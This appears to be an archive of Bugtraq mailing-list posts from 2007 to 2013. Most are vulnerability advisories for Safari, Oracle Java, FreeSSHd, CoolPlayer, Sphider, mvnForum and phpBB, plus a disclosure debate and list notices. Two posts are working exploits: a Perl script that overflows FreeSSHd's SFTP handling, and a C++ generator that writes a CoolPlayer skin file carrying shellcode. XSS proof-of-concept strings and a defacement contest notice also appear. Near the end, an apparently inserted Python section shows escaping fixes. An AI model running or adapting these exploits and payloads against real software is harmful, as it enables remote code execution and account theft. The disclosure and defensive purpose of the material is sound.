Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlJnHfEACgkQrM7A8W0gTbFKPACdGSp3GhRyvUjEzrNnlNejkGt+
pzQAoIeywymRBuPYbO9+OVGT59miZKuC
=1UST
-END PGP SIGNATURE-


[PSA-2013-0903-1] Apple Safari Heap Buffer Overflow

2013-09-04 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-0903-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Apple Safari Heap Buffer Overflow |
++-+
| Release Date   | 2013/09/03  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Vitaliy Toropov |
++-+
| System Affected| Apple Safari|
| Versions Affected  | 6.0.1 for iOS 6.0 and OS X 10.7/8, possibly earlier |
| Related Advisory   | APPLE-SA-2012-11-01-2   |
| Related CVE Number | CVE-2012-3748   |
| Vendor Patched | 2012/11/01  |
| Classification | 1-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to a 
known patched vulnerability in Apple Safari.   These details were obtained 
through the Packet Storm Bug Bounty program and are being released to the 
community.

+--+

+-+
| DETAILS |
+-+

The heap memory buffer overflow vulnerability exists within WebKit's 
JavaScriptCore JSArray::sort(...) method.  This method accepts a user-defined 
JavaScript function and calls it from the native code to compare array items. 
If this compare function reduces the array length, then the trailing array items 
will be written outside the m_storage->m_vector[] buffer, which leads to 
heap memory corruption.

The exploit for this vulnerability is JavaScript code which shows how to 
use it for memory corruption of internal JS objects (Uint32Array, etc.) 
and subsequent arbitrary code execution (custom ARM/x64 payloads can be pasted 
into the JS code).

+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code is available here:
http://packetstormsecurity.com/files/123088/

+--+

+---+
| RELATED LINKS |
+---+

http://lists.apple.com/archives/security-announce/2012/Nov/msg1.html
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-3748

+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlImrisACgkQrM7A8W0gTbHnIwCfR6vCe/+YjbxYoeHaErbHYDsN
bC0An34R0Am9RemKiIDnoa+hD3pT+M0y
=VXyD
-END PGP SIGNATURE-


[PSA-2013-0819-1] Oracle Java BytePackedRaster.verify() Signed Integer Overflow

2013-08-20 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-0819-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Oracle Java BytePackedRaster.verify() Signed Integer Overflow |
++-+
| Release Date   | 2013/08/19  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Name Withheld   |
++-+
| System Affected| Oracle Java |
| Versions Affected  | Prior to 7u25   |
| Vendor Patched | 2013/06/18  |
| Classification | 0-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to a 
known patched vulnerability in Oracle Java.   These details were obtained 
through the Packet Storm Bug Bounty program and are being released to the 
community.

+--+

+-+
| DETAILS |
+-+

The BytePackedRaster.verify() method in Oracle Java versions prior to 7u25 
is vulnerable to a signed integer overflow that allows bypassing of
dataBitOffset boundary checks.  This vulnerability allows for remote code 
execution.  User interaction is required for this exploit in that the target 
must visit a malicious page or open a malicious file.

+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code that pops calc.exe is available here:
http://packetstormsecurity.com/files/122865/

+--+

+---+
| RELATED LINKS |
+---+

http://www.oracle.com/technetwork/java/javase/7u25-relnotes-1955741.html

+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/




-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlISqa4ACgkQrM7A8W0gTbG7lwCgrha8ukKjfCtKnsKEPZ5uMRSO
JAEAnjybqCvr9Xcu28TkXcFauIFx6FSq
=H4uL
-END PGP SIGNATURE-


[PSA-2013-0813-1] Oracle Java IntegerInterleavedRaster.verify() Signed Integer Overflow

2013-08-13 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-0813-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Oracle Java IntegerInterleavedRaster.verify() Signed Integer Overflow |
++-+
| Release Date   | 2013/08/13  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Name Withheld   |
++-+
| System Affected| Oracle Java |
| Versions Affected  | Prior to 7u25   |
| Vendor Patched | 2013/06/18  |
| Classification | 0-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to a 
known patched vulnerability in Oracle Java.   These details were obtained 
through the Packet Storm Bug Bounty program and are being released to the 
community.

+--+

+-+
| DETAILS |
+-+

The IntegerInterleavedRaster.verify() method in Oracle Java versions prior 
to 7u25 is vulnerable to a signed integer overflow that allows bypassing of
dataOffsets[0] boundary checks.  This vulnerability allows for remote code 
execution.  User interaction is required for this exploit in that the target 
must visit a malicious page or open a malicious file.

+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code that pops calc.exe is available here:

http://packetstormsecurity.com/files/122806/


+--+

+---+
| RELATED LINKS |
+---+

http://www.oracle.com/technetwork/java/javase/7u25-relnotes-1955741.html


+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlIK8WoACgkQrM7A8W0gTbHW1wCeIFzW+TgACSx3aFAPzvQ/Hv+T
If4AoLycXdngGuDvAafMC2PBOquU9Opc
=GNYG
-END PGP SIGNATURE-



[PSA-2013-0811-1] Oracle Java storeImageArray() Invalid Array Indexing

2013-08-12 Thread bugtraq
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

+--+
| Packet Storm Advisory 2013-0811-1|
| http://packetstormsecurity.com/  |
+--+
| Title: Oracle Java storeImageArray() Invalid Array Indexing  |
++-+
| Release Date   | 2013/08/11  |
| Advisory Contact   | Packet Storm (advisor...@packetstormsecurity.com)   |
| Researcher | Name Withheld   |
++-+
| System Affected| Oracle Java |
| Versions Affected  | Prior to 7u25   |
| Vendor Patched | 2013/06/18  |
| Classification | 0-day   |
++-+

+--+
| OVERVIEW |
+--+

The release of this advisory provides exploitation details in relation to a 
known patched vulnerability in Oracle Java.   These details were obtained 
through the Packet Storm Bug Bounty program and are being released to the 
community.

+--+

+-+
| DETAILS |
+-+

Oracle Java versions prior to 7u25 suffer from an invalid array indexing 
vulnerability that exists within the native storeImageArray() function inside 
jre/bin/awt.dll.  This vulnerability allows for remote code execution.
User interaction is required for this exploit in that the target must visit
a malicious page or open a malicious file.

+--+

+--+
| PROOF OF CONCEPT |
+--+

The full exploit code that pops calc.exe is available here:

http://packetstormsecurity.com/files/122777/

+--+

+---+
| RELATED LINKS |
+---+

http://www.oracle.com/technetwork/java/javase/7u25-relnotes-1955741.html

+--+


++
| SHAMELESS PLUG |
++

The Packet Storm Bug Bounty program gives researchers the ability to profit 
from their discoveries.  You can get paid thousands of dollars for one day 
and zero day exploits.  Get involved by contacting us at 
getp...@packetstormsecurity.com or visit the bug bounty page at: 

http://packetstormsecurity.com/bugbounty/



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.14 (GNU/Linux)

iEYEARECAAYFAlIIYEsACgkQrM7A8W0gTbFs0QCffnEpYjY5df7CO3eMnQQGnINg
jHMAn3eQUGgfWXg1nYMChmXpc7jKSm4m
=rLHj
-END PGP SIGNATURE-


Re: Vulnerabilities in some SCADA server softwares

2011-03-24 Thread bugtraq
> > If *any* threat exists,
> > that threat is increased by public exposure of unmitigated attack
> > methodology
> 
> I think you have it wrong.
> 
> Public exposure increases the visibility, and therefore customers
> install the patches quicker.
> 
> Without public visibility, they will keep running the old code.

Actually both are true.

More systems will be owned by these unmitigated issues since more attackers 
will be aware of their existence. While it is true
that others knew about these issues (always assume so), many more will know 
about them now, and more systems likely will be exploited. This was certainly 
the case when tavis published an unmitigated windows vuln 
http://www.theregister.co.uk/2010/06/30/windows_exploit_spike/ .

To your point people who 'are paying attention' will patch once a patch is 
available, and others who wouldn't normally know
will see this in the news and become more aware of the issue/s. I don't think 
people on this list are arguing that
the public shouldn't be made aware of problems in these devices, they are 
arguing that POC shouldn't be published for
unmitigated issues as it doesn't benefit users.

If you can provide real world statistics to the list demonstrating proof that 
people are safer by being aware of unmitigated
threats with working PoC's, please send it to the list. I don't ask this to 
flame you, I think that this is data that people 
would be genuinely interested in learning from.


Regards,
- Robert
http://www.qasec.com/
http://www.webappsec.org/


Packet Storm - New Site

2010-11-15 Thread bugtraq
Packet Storm Security Launches New Site
http://packetstormsecurity.org/

November 15, 2010 -  Today is the launch of a completely
new version of Packet Storm that has been long awaited 
and is long overdue.  The security community has given
us a lot of feedback during our design phase and we 
have attempted to integrate many features.  

As you may already know, Packet Storm is home to a 
massive security portal that houses news, whitepapers,
advisories, exploits and tools.  

It's a place to showcase your work, whether it be
a research advisory or a tool you wrote.  It's a 
place to check news headlines coming down the
wire or to find out about the latest vulnerabilities.

The goal of the new site is usability and integration.  
We realized that this community is missing a centralized
portal to appropriately promote their work and interact
with others in the community.  


The site currently hosts:

More than 38,000 advisories

More than 20,000 exploits

More than 5,000 tools

More than 2,000 whitepapers

Full historical view of releases - going all the way back to 1998.



New core features:

Trending for top author, popular topics and daily additions

Tagging exists all over the place

Commenting is allowed everywhere

RSS feeds are all over the place

Search Users, Files, News and Authors



Users:

Commenting, favorites and the ability to view the favorites of the people 
you follow.

CVE and OSVDB integration

Privacy settings for all personal information

You can send messages to other users

You can switch to a minimal listing view

You can set your primary mirror; we're on four continents

Share items with Facebook, Twitter, Digg, Reddit, LinkedIn, etc


Authors:

Your very own author page and author id.

Ability to add biographic information and a picture.

Authors ranked by releases per month 


If an already established author applies with the 
same email address as is stored in the archive,
their profile will be linked to their work on the site.

We expect some issues during this launch as we are in
a beta state, so please feel free to send feedback to
feedb...@packetstormsecurity.org if you have any issues.

Thanks,
The Staff
st...@packetstormsecurity.org
http://packetstormsecurity.org/



FreeSSHd Multiple Remote Stack Overflow Vulnerabilities

2008-12-22 Thread writ3r-dont-want-bugtraq-spam-
# FreeSSHd Multiple Remote Stack Overflow Vulnerabilities. 
#
# Version : 1.2.1
# Advisory: http://www.bmgsec.com.au/advisory/42/
#
# Discovered & written by: 
# r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
#
# After Jeremy Brown reported similar buffer overflow vulnerabilities in
# FreeSSHd I forgot about it, and stopped my research on the vulnerabilities.
# Anyway just now I noticed that other vulnerable functions had not been
# reported. So below is a small list, and a small proof of concept. 
# 
# Note: All below functions overwrite EDI register. 
# open (edi)
# unlink (edi)
# mkdir (edi)
# rmdir (edi)
# stat (edi)

use strict;
use warnings;
use Net::SSH2;

my $user = "root";
my $pass = "yahh";

my $ip   = "127.0.0.1";
my $port = 22;

my $ssh2 = Net::SSH2->new();

print "[+] Connecting...\n";
$ssh2->connect($ip, $port) || die "[-] Unable to connect!\n";
$ssh2->auth_password($user, $pass) || die "[-] Incorrect credentials\n";
print "[+] Sending payload\n";

# 5000 bytes of 'A' as the path argument of an SFTP operation; the same
# payload works against any of the functions listed above (open, unlink,
# mkdir, rmdir, stat), all of which end up overwriting EDI.
my $payload = "A" x 5000;
print "$payload\n";

my $sftp = $ssh2->sftp();
$sftp->unlink($payload);

print "[+] Sent\n";
$ssh2->disconnect;


CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit

2008-12-22 Thread writ3r-dont-want-bugtraq-spam-
/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/

#include <iostream>
#include <fstream>
#include <cstring>  // strcpy
#include <cstdlib>  // exit

using namespace std;

int main()
{
    // win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum
    // http://metasploit.com
    // Bad characters: 0x00, 0x0d, 0xf4
    char scode[] =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
    "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57"
    "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38"
    "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48"
    "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
    "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
    "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54"
    "\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58"
    "\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43"
    "\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47"
    "\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a"
    "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"
    "\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53"
    "\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
    "\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39"
    "\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46"
    "\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a";

    // Layout of the skin file: 31-byte header, 1534 bytes of padding up to
    // the saved return address, the 4-byte return address (jmp esp), then
    // the shellcode. The buffer is sized from these offsets (the original
    // 1918-byte buffer was three bytes short of the shellcode's NUL).
    const int HEADER_LEN = 31;                      // strlen("[CoolPlayer Skin]\nPlaylistSkin=")
    const int PAD_LEN    = 1534;
    const int EIP_OFF    = HEADER_LEN + PAD_LEN;    // 1565
    const int SCODE_OFF  = EIP_OFF + 4;             // 1569
    char buffer[SCODE_OFF + sizeof(scode)];         // sizeof(scode) includes its NUL
    char eip[] = "\x27\x38\x03\x7d"; // jmp esp

    cout << "[*] Generating payload\n";
    strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin=");

    int i;
    for (i = 0; i < PAD_LEN; i++)
        buffer[HEADER_LEN + i] = 'A';

    for (i = 0; i < 4; i++)
        buffer[EIP_OFF + i] = eip[i];

    // Copies the shellcode together with its terminating NUL, which ends
    // the string written to the file.
    for (i = 0; i < (int)sizeof(scode); i++)
        buffer[SCODE_OFF + i] = scode[i];

    ofstream outStream;
    outStream.open("cp.ini");

    outStream << buffer;

    outStream.close();

    cout << "[+] Skin file created.\n";

    return 0;
}


confirm subscribe to bugtraq@securityfocus.com

2008-06-21 Thread bugtraq-help
Hi! This is the ezmlm program. I'm managing the
bugtraq@securityfocus.com mailing list.

I'm working for my owner, who can be reached
at [EMAIL PROTECTED]

To confirm that you would like

   [EMAIL PROTECTED]

added to the bugtraq mailing list, please send
an empty reply to this address:

   [EMAIL PROTECTED]

Usually, this happens when you just hit the reply button.
If this does not work, simply copy the address and paste it into
the To: field of a new message.

This confirmation serves two purposes. First, it verifies that I am able
to get mail through to you. Second, it protects you in case someone
forges a subscription request in your name.

Some mail programs are broken and cannot handle long addresses. If you
cannot reply to this request, instead send a message to
[EMAIL PROTECTED] and put the
entire address listed above into the Subject: line.


--- Administrative commands for the bugtraq list ---

I can handle administrative requests automatically. Please
do not send them to the list address! Instead, send
your message to the correct command address:

For help and a description of available commands, send a message to:
   [EMAIL PROTECTED]

To subscribe to the list, send a message to:
   [EMAIL PROTECTED]

To remove your address from the list, just send a message to
the address in the ``List-Unsubscribe'' header of any list
message. If you haven't changed addresses since subscribing,
you can also send a message to:
   [EMAIL PROTECTED]

or for the digest to:
   [EMAIL PROTECTED]

For addition or removal of addresses, I'll send a confirmation
message to that address. When you receive it, simply reply to it
to complete the transaction.

If you need to get in touch with the human owner of this list,
please send a message to:

[EMAIL PROTECTED]

Please include a FORWARDED list message with ALL HEADERS intact
to make it easier to help you.

--- Enclosed is a copy of the request I received.

Return-Path: [EMAIL PROTECTED]
Received: (qmail 28055 invoked from network); 21 Jun 2008 06:25:37 -
Received: from mail.securityfocus.com (205.206.231.9)
  by lists2.securityfocus.com with SMTP; 21 Jun 2008 06:25:37 -
Received: (qmail 23133 invoked by alias); 21 Jun 2008 07:25:44 -
Received: (qmail 23088 invoked from network); 21 Jun 2008 07:25:43 -
Received: from www2.securityfocus.com (HELO securityfocus.com) (205.206.231.12)
  by mail.securityfocus.com with SMTP; 21 Jun 2008 07:25:43 -
Received: (qmail 10660 invoked by uid 500); 21 Jun 2008 06:32:06 -
Date: 21 Jun 2008 06:32:06 -
Message-ID: [EMAIL PROTECTED]
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: Subscribe

[EMAIL PROTECTED]


Re: xt:Commerce possible DoS

2008-06-02 Thread decoder-bugtraq
With respect to my last post, the company behind the xt:Commerce shop software 
now has confirmed the security vulnerability in current versions and will 
provide a patch very soon.



Best regards,



Christian Holler


VisualSentinel 0.7 Cross Agent Scripting Vulnerability

2008-05-31 Thread bugtraq
VisualSentinel 0.7 Cross Agent Scripting


# Discovered by: Alfredo Panzera, Opencosmo Security

# Software vendor:   http://www.opencosmo.com

# Date:  31-05-2008


# Vulnerability:

The vulnerability consists of injecting JavaScript code by falsifying the
attacker's user agent during an attack; the falsified user agent is then
saved in the log.


# Vulnerable string:

$user_useragent = $_SERVER ['HTTP_USER_AGENT'];


# Solution:

The development team has promptly issued a patch for the vulnerability.

You can download the latest version from the download page.

http://www.opencosmo.com/product-1.html



##


Opencosmo Security

http://www.opencosmo.com


xt:Commerce possible DoS

2008-05-23 Thread decoder-bugtraq
Hello,


I've found a suspicious behavior of the xt:Commerce shop software (only 
verified in their demo shop).


When entering  as a search query in the Quick Purchase field at the left 
side of the shop, I get:


Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 
8388611 bytes) in 
/is/htdocs/wp1052946_X4Y7B4PF21/www/includes/classes/class.inputfilter.php on 
line 136


This looks very much like a problem in the input filter that causes too much 
memory to be allocated (and that could of course be used for DoS)


Unfortunately, the source code is not available freely, so I cannot investigate 
this further. If anyone has the source code available, feel free to check out 
the specific region in the input filter.


I informed the company but they closed my ticket without any response, and even 
after I reopened it, there hasn't been any feedback for almost 2 weeks now.



Best regards,



Christian Holler


Sphider 1.3.4 Cross Site Scripting

2008-05-06 Thread decoder-bugtraq
-BEGIN PGP SIGNED MESSAGE-

Hash: SHA1


Sphider Cross Site Scripting Vulnerability


Original release date: 2008-04-29

Last revised: 2008-05-06

Latest version: http://users.own-hero.net/~decoder/advisories/sphider134-xss.txt

Source: Christian Holler http://users.own-hero.net/~decoder/



Systems Affected:


 Sphider 1.3.4 (http://www.sphider.eu/) - A PHP Search Engine


Severity: Moderate



Overview:


 Sphider is a search engine with several features; one is a search suggestion
 feature, as in "Did you mean xyz?", that corrects possible typos in your search,
 without however sanitizing this output. This feature is off by default, but
 is turned on by many sites for convenience.


I. Description


 The suggestion feature in Sphider outputs the complete query if there is at
 least one word in the query that the script has found a possible correction
 for. This word is highlighted and the rest of the search query is returned
 as it is. However, this output is completely unsanitized, allowing
 HTML/JavaScript to be included.


II. Impact


 Depending on the site where this search script is deployed, this attack can be

 used to steal cookies from other users by tricking them into visiting a given

 URL.


III. Proof of concept


 search.php?query=xsss%20%3Cscript%3Ealert('HELLO');%3C/script%3E&search=1

 

 where the first word in the query, xsss is a word that can be corrected by

 the search script. This generally depends on the indexed site(s) but such a

 word is very easy to find.


IV. Solution


 Currently none, author has been informed.


Timeline:


 2008-04-29: Author informed

 2008-05-06: Vulnerability notice published


-BEGIN PGP SIGNATURE-

Version: GnuPG v2.0.6 (GNU/Linux)


iD8DBQFIIMGYJQIKXnJyDxURAm44AJ9JbT+63Krpg95BZatccKal29DhkwCgoAE9

eNhj/JgskwQVKgmdnFBEVG0=

=DZrL

-END PGP SIGNATURE-


mvnForum 1.1 Cross Site Scripting

2008-05-06 Thread decoder-bugtraq
-BEGIN PGP SIGNED MESSAGE-

Hash: SHA1


mvnForum Cross Site Scripting Vulnerability


Original release date: 2008-04-27

Last revised: 2008-05-06

Latest version: http://users.own-hero.net/~decoder/advisories/mvnforum-jsxss.txt

Source: Christian Holler http://users.own-hero.net/~decoder/



Systems Affected:


 mvnForum 1.1 (http://www.mvnforum.com/) - A Java J2EE/Jsp/Servlet forum


Severity: Moderate



Overview:


 An attacker who has the rights to start a new thread or to reply
 to an existing one is able to include JavaScript code in the topic,
 which is executed when other users use the quick reply button shown
 for every post.


 This point of injection is possible because the topic text is part
 of an onclick event used for the quick reply function, and the
 software only escapes characters that are typical for HTML cross
 site scripting attacks. In this case, the single quote character is not
 escaped.


I. Description


 The list of standard functions for threads includes a typical feature

 called quick reply. For user convenience, each post has a button that

 jumps to the form field allowing to send a quick reply, whilst changing

 the topic text of the reply at the top of this form. This is accomplished

 using javascript and the topic that is replied to. The source code for

 this button looks like this:


 <a href="#message" onclick="QuickReply('24','Re: Some thread topic');">
 <img src="/forum/mvnplugin/mvnforum/images/icon/button_quick_reply.gif"
  border="0" alt="Quick reply to this post" title="Quick reply to this post"
 /></a>


 Because single quotes are not escaped in the topic context, it is possible

 to break out of the second argument and execute arbitrary javascript code

 in the client's browser.


II. Impact


 Any user that is allowed to post anywhere can use this flaw to steal

 sensitive information such as cookies from other users. Especially

 because the forum uses simple reusable MD5 hashes in their cookies,

 this attack makes it possible to gain unauthorized access to other

 user accounts.


 However, this attack relies on the user to click the quick reply

 button and should therefore be considered only a moderate risk.


III. Proof of concept


 Creating a new thread or replying to a thread with the following subject

 will demonstrate the problem after hitting the quick reply button above

 the post text.

 

 Test', alert('XSS ALERT') , '



IV. Solution


 At the time of writing, a fix is available in CVS.

 
http://mvnforum.cvs.sourceforge.net/mvnforum/mvnforum/srcweb/mvnplugin/mvnforum/user/viewthread.jsp?r1=1.316r2=1.317


Timeline:


 2008-04-27: mvnForum authors informed

 2008-05-01: Fix available in CVS

 2008-05-06: Vulnerability notice published


-BEGIN PGP SIGNATURE-

Version: GnuPG v2.0.6 (GNU/Linux)


iD8DBQFIIMEXJQIKXnJyDxURAlOPAJ96XH9zfjLJ1jMjCCpheurxwJuqMACfbz2S

FWggJDc19FDPXiiyS+AP9iU=

=Tixo

-END PGP SIGNATURE-
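
The three advisories above (VisualSentinel's logged User-Agent, Sphider's
"Did you mean" echo, and mvnForum's QuickReply onclick handler) are the same
defect in two different output contexts. The following is an added example,
not code from any of those projects: the HTML body context, where html.escape
is sufficient, next to the JavaScript-string-inside-an-attribute context,
where HTML escaping alone leaves the single quote open and the value has to be
encoded as a JS string literal first. Function names, the sample inputs and
the use of json.dumps as the JS string encoder are my choices, not the
projects'.

```python
import html
import json
import re

# Constructed sample inputs: the Sphider PoC query from the advisory above,
# a User-Agent of the kind VisualSentinel logs, and the mvnForum PoC topic.
SPHIDER_QUERY = "xsss <script>alert('HELLO');</script>"
LOGGED_USER_AGENT = "Mozilla/5.0 <img src=x onerror=alert(document.cookie)>"
MVNFORUM_TOPIC = "Test', alert('XSS ALERT') , '"


def render_html_body_vulnerable(text: str) -> str:
    """HTML body context with no encoding: the suggestion feature and the
    attack log viewer both behave like this."""
    return "<p>Did you mean <b>" + text + "</b>?</p>"


def render_html_body_fixed(text: str) -> str:
    """HTML body context: html.escape neutralises < > & \" and '."""
    return "<p>Did you mean <b>" + html.escape(text, quote=True) + "</b>?</p>"


def html_escape_no_quotes(s: str) -> str:
    """An escaper that only handles the characters 'typical for HTML cross
    site script attacks' and forgets the single quote, as the mvnForum
    advisory describes (my reconstruction of that behaviour)."""
    return (s.replace("&", "&amp;").replace("<", "&lt;")
             .replace(">", "&gt;").replace('"', "&quot;"))


def quick_reply_vulnerable(post_id: str, topic: str) -> str:
    """The topic lands inside a JavaScript string literal inside an HTML
    attribute, but only HTML escaping (without ') is applied."""
    return ('<a href="#message" onclick="QuickReply(\'%s\',\'%s\');">reply</a>'
            % (html_escape_no_quotes(post_id), html_escape_no_quotes(topic)))


def js_string(s: str) -> str:
    """Encode s as a JavaScript string literal. json.dumps escapes quotes,
    backslashes and control characters; < and > are escaped on top so the
    literal can never contain </script>."""
    return json.dumps(s).replace("<", "\\u003c").replace(">", "\\u003e")


def quick_reply_fixed(post_id: str, topic: str) -> str:
    """Encode inside-out: JS string literal first, then the whole handler as
    an HTML attribute value."""
    js_call = "QuickReply(%s, %s);" % (js_string(post_id), js_string(topic))
    return '<a href="#message" onclick="%s">reply</a>' % html.escape(js_call, quote=True)


def onclick_js(tag: str) -> str:
    """What the browser executes: the onclick attribute after HTML decoding."""
    m = re.search(r'onclick="([^"]*)"', tag)
    return html.unescape(m.group(1)) if m else ""


if __name__ == "__main__":
    print(render_html_body_vulnerable(SPHIDER_QUERY))
    print(render_html_body_fixed(SPHIDER_QUERY))
    print(onclick_js(quick_reply_vulnerable("24", MVNFORUM_TOPIC)))
    print(onclick_js(quick_reply_fixed("24", MVNFORUM_TOPIC)))
```

With the mvnForum payload the vulnerable handler decodes to
QuickReply('24','Test', alert('XSS ALERT') , ''); so the alert runs as a third
argument, while the fixed handler decodes to a call whose second argument is
one double-quoted string containing the whole payload.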


OneSecurityDay 2008 - Web application auditing challenge

2008-04-14 Thread bugtraq
 Translation by Google Translate 


Opencosmo Security has organized the OneSecurityDay event, which is held each
year. The event is dedicated to all web application enthusiasts wishing to
compete with other auditors from around the world.


For those who do not know, OneSecurityDay is about finding vulnerabilities in
PHP/MySQL applications in order to bypass the protections and gain
administrator access.

The winner will not only find his name on next year's flyer, but will also
win a prize of 300 Fr. (200 €).


To participate, just send an e-mail to [EMAIL PROTECTED] with your details
and the preferred method of payment:

Name:

Surname:

Nickname:

E-mail:

When a staff member of Opencosmo replies, you will be given an ID that
identifies the attacker. This ID is to be placed on the defaced index.

(You can choose the payment method when you win.)


The rules are very simple; by participating you agree to the following terms
in their entirety. If you do not agree, you cannot attend the event.


REGULATION

It is prohibited:

1.1 - To use the space made available to commit acts of abuse such as:

 * Sending spam messages.

 * Distributing viruses, child pornography and warez material.

 * Any other illegal act.

1.2 - To distribute the source of the CMS made available for the attack. In
any case, the staff will release it.

1.3 - To use vulnerability-scanning programs such as Acunetix.

1.4 - To insult or disturb other competitors.

1.5 - To attack parts of the site that are not in scope.

1.6 - To win the prize, the competitor must delete every CMS file and leave
the index with their identification number written on it.


About VisualSentinel

VisualSentinel is an application written in PHP that blocks XSS, RFI/LFI and
SQL injection attacks. During an attack it alerts the administrator via
e-mail and saves a log file with the IP, browser and attack string.

Although the application is very lean, it is powerful at the same time;
competitors will have to use their imagination and their own software to
bypass the sentinel's security controls.


About OneSecurityDay 2008

The event will be held on April 18, 2008 at 21:00, and each competitor will
be given the link to begin the attack. The first to bypass the sentinel and
delete all files, leaving the index with their ID, will be the winner.


The prize will be sent depending on the method of payment agreed with the 
winner at the time of registration.


For more details send an e-mail to [EMAIL PROTECTED]



Mario Pasini

Manager OneSecurityDay 2008

http://www.opencosmo.com


phpBB2 2.0.22 Cross Site Scripting Vulnerability

2008-01-02 Thread bugtraq
Opencosmo Security

http://www.opencosmo.com


Author: Alfredo Panzera, Opencosmo Security

Vendor: phpBB.com

Version: 2.0.22


Exploit: 

Go to http://[website]/forum/admin/admin_groups.php and into 'Group 
description:' insert your XSS. 




[XSS] OpenNewsletter v2.5 Multipe XSS Attacks

2007-12-06 Thread bugtraq


Software: OpenNewsletter

Homepage: http://www.selfexile.com/projects/opennewsletter

Affected version: v2.5 and below

